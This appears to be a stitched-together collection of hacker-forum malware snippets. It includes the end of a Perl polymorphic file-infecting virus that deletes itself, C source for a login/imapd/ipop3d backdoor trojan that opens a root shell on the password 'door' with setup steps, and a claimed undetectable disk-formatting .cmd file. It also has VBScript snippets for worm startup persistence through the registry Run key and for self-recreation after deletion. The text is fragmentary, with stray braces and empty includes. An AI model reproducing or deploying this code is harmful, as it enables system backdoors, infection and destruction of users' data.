# change variables
# $Virus File @Virus $X $Key $Vir
# l1l 1l1 ll1 lll 11l l11
@vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
foreach $replace (@vars){
$newVar = chr(int(rand(25)+65)); # with a letter
$newVar .= int(rand(65535)); # and a random number
for ( $b=0; $b < @Vir; $b++){
@Vir[$b] =~ s/$replace/$newVar/g ;
}
}


do {
chomp @Temp[0];
@Temp[0] .= " \n";
} until((length(@Temp[0]) % 5) == 0 );


open(File, ">$FileName"); # and write the infected
$Temp = join("\n", @Vir);


for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
if ( @Temp[$X] =~ "\;\n" ) { # insert virus in the middle
$Temp2 = join("", @Temp[0..$X]); # write first part
print File $Temp2; # and virus
print File $Temp; $X++;
$Y = (@Temp);
$Temp2 = join("", @Temp[$X..$Y]); # insert rest of the file
print File $Temp2;
goto CloseFile;
}
}
$Temp2 = join("", @Temp); # no possibility to insert virus
print File $Temp; # file back to disk
print File $Temp2; # without EPO


CloseFile:
close(File);
}}}}

$a = `rm $0`; # delete our selves..

Trojan Daemon[SJ]
Universal trojan ( login / imapd / qpopd )
But will work on more daemons and on most systems.
After installed on the system.
Telnet to the daemon and you will have 1 second to type in
the trojan passwd to get root access else it executes the real daemon.


( login / ipop3d / imapd trojan )
This is an combined login / ipop3d / imapd trojan.
* This should work with other deamons but i have only tested these 3
EAL == mv the real deamon to this path.
* TROJAN == This is the real path of the deamon, put the trojan here.It defaults to login trojan now.
* Dont forgot you might have to the rights of the trojan.
* Telnet to the port whatever deamon its set for.
* The passwd you need to enter in one second == door
* and you will get that lovely # =)
* This works on most systems.


#include
#include
#include
#include

#define REAL "/bin/.login"
#define TROJAN "/bin/login"
#define ROOT "door"

char **execute;
char passwd[5];

int main(int argc, char *argv[]) {
void connection();

signal(SIGALRM,connection);
alarm(1);
execute=argv;
*execute=TROJAN;

scanf("%s",passwd);

if(strcmp(passwd,ROOT)==0) {
alarm(0);
execl("/bin/sh","/bin/sh","-i",0);
exit(0);
}
else
{
execv(REAL,execute);
exit(0);
}
}


void connection()
{
execv(REAL,execute);
exit(0);
}
It`s basically not a virus but will work like same...............

01001011000111110010010101010101010000011111100000

just save it notepad wit extion .cmd

and scan with any antivirus it will not be detected....................but if opened it will format whole hard disk..............
Startup Virus
With this two lines your worm will start with windows.
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\Worm.vbs %"
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Anti Deletion Virus
This function must be the last one called, cause it never ends.
If it detects that the file has been deleted, it'screated again.
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯